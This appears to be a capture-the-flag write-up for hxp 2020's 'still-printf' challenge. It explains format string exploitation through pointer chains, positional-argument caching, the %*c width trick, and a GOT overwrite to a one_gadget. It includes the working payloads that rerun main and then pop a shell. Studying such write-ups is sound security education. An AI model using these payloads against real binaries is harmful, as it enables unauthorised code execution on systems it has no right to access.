Format string exploitation can get much more complex than the simple arbitrary write trick (with %n) everyone knows about. A particularly important concept are pointer chains, which we employ when we cannot acquire a leak. We will use 2020/hxp/still-printf to demonstrate the idea. You can also read the writeups by redrocket and mem2019. The challenge source is as follows:

#include <stdio.h>
#include <stdlib.h>

int main() {
	char buf[0x30];
	setbuf(stdout, NULL);
	fgets(buf, sizeof(buf), stdin);
	printf(buf);
	exit(0);
}

With mitigations:

RELRO:      No RELRO
Stack:      No canary found
NX:         NX enabled
PIE:        PIE enabled

The size of our buffer is not that large (48) and the output is actually printed (as opposed to piped to /dev/null) so we are already limited in some ways. It’s probably impossible to get RCE directly so we will have to find a way to re-run the main function. Two most obvious approaches are overwriting the GOT of exit and the return address of the printf call. Here we will opt for the latter. I will use absolute addresses for clarity but don’t forget they are all subject to ASLR.

Okay so we will use the classic format string write with %hhn to overwrite the Least Significant Byte (LSByte) of 0x5555555550fe (where printf returns) to 0x5555555550c4 (start of main). The printf return is located on the stack at 0x7fffffffe238. We need the value 0x7fffffffe238 written somewhere on the stack to be able to use %n write to it. It isn’t anywhere on the stack by default (we can check with search -p 0x7fffffffe238) so we will have to write it ourselves.

Since we don’t have a stack leak to make the 0x7fffffffe238 value we will have to overwrite the (two) LSByte of some other stack address. Thus we need to look for pointer chains, the game plan is as follows (the stack right after stepping into printf): alt We will use %15$n to overwrite the value at address 0x7fffffffe358. Specifically we will overwrite the two LSByte so 0x7fffffffe6fa becomes 0x7fffffffe238. Then we will use %41$n to overwrite the value at address 0x7fffffffe238 as covered before, changing it to 0x5555555550c4. So we come up with something like this:

payload = b"%57912c%15$hn%140c%41$hhn"
# 0xe238 = 57912; 0xc4 - 0x38 = 140

Unfortunately this doesn’t work. We can see that the first overwrite happened as expected: alt However the return address of the printf call hasn’t been overwritten at all. And in fact, if we look at 0x7fffffffe6fa, the old value at 0x7fffffffe358 (i.e. %41$n) we can see: alt The LSByte is overwritten to c4! What’s going on?

As it turns out, when printf first encounters a positional argument (the %m$<type> syntax) it saves the values of all those arguments internally to the args_value array. So when we do %41$n it uses the original value of 0x7fffffffe6fa rather than the modified one!

The way we will get around this is by getting to the 15th argument with b"%c"*14 + b"%n" instead of %15$n, and we will then use %41$n as normal.

payload = b"%c"*13 + b"%57899c%hn%140c%41$hhn"
#              ^13        ^14  ^15
# 0xe238 = 57912; 57912 - 13 = 57899; 0xc4 - 0x38 = 140
# len(payload) == 0x30

Unfortunately although the buffer is 0x30 bytes long fgets zeroes out the last byte making our payload one byte too long in practice. To make our payload one byte shorter we have to introduce another trick.

The * specifier works as a width specifier taken from an argument, i.e. it’s used in situations like this:

printf("%*c", 10, 'K');
// the output is "         K"

This is useful for us as it moves printf up by two arguments. In other words, we can do %*c instead of %c%c, saving exactly one character. However, trouble comes from the fact that we know %c will always print one character, while %*c will print a different amount of characters depending what is currently on the stack. Remember that it’s crucial for us to know the number of printed characters for %n to work.

Looking at the stack alt The zero at offset 14 would be good, but since two arguments are taken it would take both 14 and 15 (and we need to write to 15). Luckily looking at the registers: alt We can see that r8 has the value zero. We don’t need r9 either so this is the perfect spot for us to put our %*c, knowing it will print one character. Note that if padding is less than the amount of characters, all the characters are still printed. Our payload is finally:

payload = b"%c"*3 + b"%*c" + b"%c"*8 + b"%57900c%hn%140c%41$hhn"
#             ^3       ^4,5      ^13        ^14  ^15
# 0xe238 = 57912; 57912 - (3 + 1 + 8) = 57900; 0xc4 - 0x38 = 140
# len(payload) == 0x2f

And we can see that the printf call really does return to the start of main!

Now in practice to solve this challenge it is useful to replace some of the %c with %p to get some leaks, which will allows to perform standard arbitrary writes.

payload = "%p"*2+"%c"+"%*c"+"%c"*6+"%p"+"%c"+"%57861c%hn%140c%41$hhn"
# ^1,2  ^3   ^4,5  ^6-11  ^12   ^13   ^14   ^15
# 0xe238 = 57912; 57912 - (2*14 + 1 + 1 + 6 + 14 + 1) = 57861;
# (0xc4 - 0xe238) % 0x100 = 140

Then in the second run we will just overwrite the GOT entry of exit to a one_gadget:

target = onegadgets[2]
# ovewriting 0x7ffff7|e45ea0| into 0x7ffff7|e508a3|
first_write = target % 0x10000 # bottom two bytes
second_write = ((target >> 16) - first_write) % 0x100
# ^ third LSByte 
payload = f"%{first_write}c%9$hn%{second_write}c%10$hhn"
payload = payload.ljust(24,"A").encode()
payload += pack(exe.got['exit']) + pack(exe.got['exit'] + 2)

which is just standard format string AAW (arbitrary address write).

And with a 1/4096 chance (due to stack leak partial overwrites) we get a shell!

You can find the full exploit here: still-printf.py, and see my writeup for stiller-printf for more format string shenanigens.